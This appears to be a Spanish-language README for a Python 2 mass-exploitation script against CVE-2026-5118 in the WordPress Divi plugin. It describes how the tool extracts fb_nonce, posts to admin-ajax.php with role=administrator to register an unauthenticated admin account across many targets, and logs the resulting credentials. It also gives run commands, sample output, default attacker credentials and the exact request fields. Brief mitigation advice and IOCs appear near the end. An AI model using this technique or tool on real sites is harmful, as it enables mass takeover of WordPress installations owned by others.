
CVE-2026-5118 – Exploit masivo en Python2 para el plugin Divi de WordPress Registro de administrador no autenticado a través de admin-ajax.php. Escáner multiproceso con extracción de nonce.
⚠️ ADVERTENCIA: Esta herramienta es solo para pruebas de penetración autorizadas e investigación de seguridad.
El acceso no autorizado a sistemas informáticos es ilegal. Úsela solo en sistemas que posea o para los que tenga permiso explícito por escrito para realizar pruebas. Más descargo de responsabilidad: Puede ver el descargo en la portada de Jenderal92. Puede consultarlo AQUÍ !!!
Este script de Python 2 explota una vulnerabilidad de escalada de privilegios en el plugin Divi de WordPress (y formularios Divi relacionados). Permite el registro remoto de una cuenta de administrador mediante:
fb_nonce del formulario de registro Divi del objetivo./wp-admin/admin-ajax.php con role=administrator.https:// si falta.de_fb_obj).success, user_id, user created, etc.).results.txt con el formato:https://target.com/wp-admin/ | usuario | contraseñaurllib2, Queue, threading – no compatible con Python 3 sin modificaciones)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
Cree un archivo de texto con un dominio o URL por línea. Puede omitir http:// / https:// – el script añadirá https:// por defecto.
Ejemplo targets.txt:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total de objetivos : 4
[*] Credenciales : Attacker / Attacker@123#+
[*] Hilos : 20
[*] Archivo de salida : results.txt
[1] Comprobando https://example.com
[+] ¡ÉXITO! https://example.com/wp-admin/
[2] Comprobando https://vulnerable-site.com
[+] ¡ÉXITO! https://vulnerable-site.com/wp-admin/
[3] Comprobando http://192.168.1.100/wordpress
[3] FALLÓ http://192.168.1.100/wordpress
[4] Comprobando https://test-site.org
[4] FALLÓ https://test-site.org
=== FINALIZADO ===
Exitosos: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
Puede personalizar las siguientes variables al inicio del script:
https:// si no se proporciona esquema.fb_nonce mediante patrones regex.multipart/form-data que contiene:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<nonce extraído>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailPara administradores de WordPress que usan Divi:
admin-ajax.php.role que pueda ser manipulado.Indicadores de compromiso (IOCs):
admin-ajax.php con action=de_fb_ajax_submit_ajax_handlerAttacker)role=administrator en los registros de accesoEste software se proporciona con fines educativos y solo para pruebas de seguridad autorizadas. El autor no asume ninguna responsabilidad por el uso indebido o daños causados por esta herramienta. Al usar este software, usted acepta:
Violar estos términos puede resultar en enjuiciamiento penal, multas o prisión.
Las solicitudes de extracción (pull requests) son bienvenidas para mejoras (port a Python 3, mejor extracción de nonce, detección de rutas de registro adicionales). Por favor, mantenga el descargo ético.
| Variable | Valor por defecto | Descripción |
|---|
DEFAULT_USERNAME | Attacker | Nombre de usuario a registrar |
DEFAULT_PASSWORD | Attacker@123#+ | Contraseña (fuerte con caracteres especiales) |
DEFAULT_EMAIL | [email protected] | Dirección de correo electrónico |
THREAD_COUNT | 20 | Número de hilos concurrentes |
OUTPUT_FILE | results.txt | Archivo para guardar los objetivos exitosos |